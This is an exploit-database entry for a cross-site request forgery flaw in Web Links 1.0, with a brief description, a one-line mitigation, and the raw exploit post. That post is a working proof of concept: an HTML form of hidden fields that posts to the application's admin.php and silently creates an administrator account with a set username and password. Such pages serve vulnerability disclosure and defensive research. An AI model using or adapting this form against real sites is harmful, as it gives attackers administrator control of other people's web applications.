header-logo
Suggest Exploit
vendor:
Web Links
by:
AtT4CKxT3rR0r1ST
8,8
CVSS
HIGH
Cross-Site Request Forgery (XSRF)
352
CWE
Product Name: Web Links
Affected Version From: Web Links 1.0
Affected Version To: Web Links 1.0
Patch Exists: Unknown
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Unknown

Web Links 1.0 XSRF Vulnerability (Add Admin)

A Cross-Site Request Forgery (XSRF) vulnerability exists in Web Links 1.0, which allows an attacker to add an admin user to the application. The attacker can craft a malicious HTML form with hidden fields containing the username, password, email, and group_id of the new admin user. When the form is submitted, the application will add the user without any authentication.

Mitigation:

The application should validate the request origin and verify that the user is authenticated before allowing the request to be processed.
Source

Exploit-DB raw data:

Web Links 1.0 XSRF Vulnerability (Add Admin)
====================================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://allomani.com/en/weblinks_script.html
####################################################################

===[ Exploit ]===

<form method="POST" name="form0" action="http://localhost/Web Links/admin.php">
<input type="hidden" name="action" value="adduserok"/>
<input type="hidden" name="hash" value="e10adc3949ba59abbe56e057f20f883e"/>
<input type="hidden" name="username" value="webadmin"/>
<input type="hidden" name="password" value="123456"/>
<input type="hidden" name="email" value="Example@hotmail.com"/>
<input type="hidden" name="group_id" value="1"/>
<input type="hidden" name="useraddbutton" value="Add"/>
</form>

</body>
</html>
####################################################################